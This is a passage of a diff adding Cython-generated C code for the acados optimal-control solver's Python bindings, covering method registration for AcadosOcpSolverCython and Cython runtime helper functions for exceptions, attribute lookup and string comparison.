__Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_eval_param_3, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__50)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 207, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_7, __pyx_tuple__51); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_eval_param_sens, __pyx_t_7) < 0) __PYX_ERR(0, 207, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":232 + * + * + * def get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get the last solution of the solver: + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_get, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__53)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_get, __pyx_t_7) < 0) __PYX_ERR(0, 232, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":275 + * + * + * def print_statistics(self): # <<<<<<<<<<<<<< + * """ + * prints statistics of previous solver run as a table: + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_print_stat, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__54)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_print_statistics, __pyx_t_7) < 0) __PYX_ERR(0, 275, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_store_iter, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__56)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 293, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_7, __pyx_tuple__57); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_store_iterate, __pyx_t_7) < 0) __PYX_ERR(0, 293, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":330 + * + * + * def load_iterate(self, filename): # <<<<<<<<<<<<<< + * """ + * Loads the iterate stored in json file with filename into the ocp solver. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_load_itera, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__59)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 330, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_load_iterate, __pyx_t_7) < 0) __PYX_ERR(0, 330, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":346 + * + * + * def get_stats(self, field_): # <<<<<<<<<<<<<< + * """ + * Get the information of the last solver call. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_get_stats, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__61)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 346, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_get_stats, __pyx_t_7) < 0) __PYX_ERR(0, 346, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":428 + * + * + * def __get_stat_int(self, field): # <<<<<<<<<<<<<< + * cdef int out + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, &out) + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___get_stat, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__63)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 428, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_AcadosOcpSolverCython__get_stat, __pyx_t_7) < 0) __PYX_ERR(0, 428, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":433 + * return out + * + * def __get_stat_double(self, field): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___get_stat_2, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__64)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 433, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_AcadosOcpSolverCython__get_stat_2, __pyx_t_7) < 0) __PYX_ERR(0, 433, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":438 + * return out + * + * def __get_stat_matrix(self, field, n, m): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___get_stat_3, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__66)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 438, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_AcadosOcpSolverCython__get_stat_3, __pyx_t_7) < 0) __PYX_ERR(0, 438, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":444 + * + * + * def get_cost(self): # <<<<<<<<<<<<<< + * """ + * Returns the cost value of the current solution. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_get_cost, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__68)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 444, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_get_cost, __pyx_t_7) < 0) __PYX_ERR(0, 444, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":460 + * + * + * def get_residuals(self, recompute=False): # <<<<<<<<<<<<<< + * """ + * Returns an array of the form [res_stat, res_eq, res_ineq, res_comp]. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_get_residu, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__70)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 460, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_7, __pyx_tuple__71); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_get_residuals, __pyx_t_7) < 0) __PYX_ERR(0, 460, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":492 + * + * # Note: this function should not be used anymore, better use cost_set, constraints_set + * def set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * + * """ + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_set, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__73)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 492, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_set, __pyx_t_7) < 0) __PYX_ERR(0, 492, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":551 + * + * + * def cost_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the cost module of the solver. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_cost_set, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__75)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 551, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_cost_set, __pyx_t_7) < 0) __PYX_ERR(0, 551, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":584 + * + * + * def constraints_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the constraint module of the solver. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_constraint_2, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__76)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_constraints_set, __pyx_t_7) < 0) __PYX_ERR(0, 584, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":619 + * + * + * def dynamics_get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get numerical data from the dynamics module of the solver: + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_dynamics_g, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__78)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 619, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_dynamics_get, __pyx_t_7) < 0) __PYX_ERR(0, 619, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "acados_template/acados_ocp_solver_pyx.pyx":641 + * + * + * def options_set(self, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set options of the solver. + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython_options_se_2, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__80)); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 641, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem((PyObject *)__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dict, __pyx_n_s_options_set, __pyx_t_7) < 0) __PYX_ERR(0, 641, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + PyType_Modified(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___reduce_c, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__81)); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_7) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_7 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_AcadosOcpSolverCython___setstate, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, ((PyObject *)__pyx_codeobj__83)); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_7) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":1 + * # -*- coding: future_fstrings -*- # <<<<<<<<<<<<<< + * # + * # Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + */ + __pyx_t_7 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_7) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_7); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init acados_template.acados_ocp_solver_pyx", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init acados_template.acados_ocp_solver_pyx"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, 